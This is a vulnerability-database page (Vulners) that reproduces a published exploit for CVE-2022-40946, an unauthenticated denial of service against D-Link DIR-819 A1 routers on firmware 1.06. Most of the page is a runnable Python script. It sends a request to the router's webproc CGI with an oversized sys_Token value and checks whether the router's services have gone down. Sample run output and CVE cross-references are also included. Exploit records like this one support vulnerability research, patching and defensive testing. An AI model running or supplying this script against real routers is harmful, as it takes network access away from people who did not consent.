Vulners
Lucene search
D-Link DIR 819 A1 - Denial of Service Exploit
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Uncontrolled Resource Consumption in Dlink Dir-819_Firmware | 13 Sep 202220:22 | – | githubexploit |
 | The vulnerability of D-Link DIR-819 router’s microprogramming software, related to improper cleaning or freeing of resources, allows a intruder to trigger a service failure. | 17 May 202300:00 | – | bdu_fstec |
 | CVE-2022-40946 | 16 Apr 202307:27 | – | circl |
 | D-Link DIR-819 安全漏洞 | 25 Mar 202300:00 | – | cnnvd |
 | CVE-2022-40946 | 16 Apr 202300:00 | – | cve |
 | CVE-2022-40946 | 16 Apr 202300:00 | – | cvelist |
 | DLink DIR 819 A1 - Denial of Service | 25 Mar 202300:00 | – | exploitdb |
 | EUVD-2022-44194 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-40946 | 16 Apr 202302:15 | – | nvd |
 | D-Link DIR-819 DoS Vulnerability | 18 Apr 202300:00 | – | openvas |
10
# Exploit Title: DLink DIR 819 A1 - Denial of Service
# Date: 30th September, 2022
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
# Tested on: Firmware Version - 1.06 Hardware Version - A1
# CVE : CVE-2022-40946
#
# Github: https://github.com/whokilleddb/dlink-dir-819-dos
#
# $ ./exploit.py -i 192.168.0.1
# [+] DLink DIR-819 DoS exploit
# [i] Address to attack: 192.168.0.1
# [i] Using SSL: False
# [i] Request Timeout: 30s
# [i] Buffer Length: 19
# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
# [+] Exploit Successful!
#!/usr/bin/env python3
import sys
import string
import urllib3
import requests
import argparse
import random
import socket
from rich import print
# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Globals
TIMEOUT = 30
#BUFFER_LEN = 19
BUFFER_LEN = 32
# Class to exploit
class Exploit:
def __init__(self, ip, is_ssl):
"""Initialize the constructor"""
self.ip = ip
self.is_ssl = is_ssl
_payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
if self.is_ssl:
self.payload = f"https://{_payload}"
else:
self.payload = f"http://{_payload}"
def show(self):
"""Show the parameters"""
print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")
def run(self):
"""Run the exploit"""
print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
self.show()
try:
r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
if "Internal Error" in r.text:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
else:
print(f"[bold][[red]![/red]] Exploit Failed :([/bold]")
except requests.exceptions.Timeout:
print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
except Exception as e:
print(f"Error occured as: {e}")
def main():
"""Main function to run"""
parser = argparse.ArgumentParser(
description="DLink DIR-819 Unauthenticated DoS")
parser.add_argument('-i', '--ip', required=True, help="IP of the router")
parser.add_argument('-s', '--ssl', required=False, action="store_true")
opts = parser.parse_args()
try:
ip = socket.gethostbyname(opts.ip)
except socket.error:
print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
return
is_ssl = opts.ssl
exploit = Exploit(ip, is_ssl)
exploit.run()
if __name__ == '__main__':
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2023 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.5
EPSS0.05399
SSVC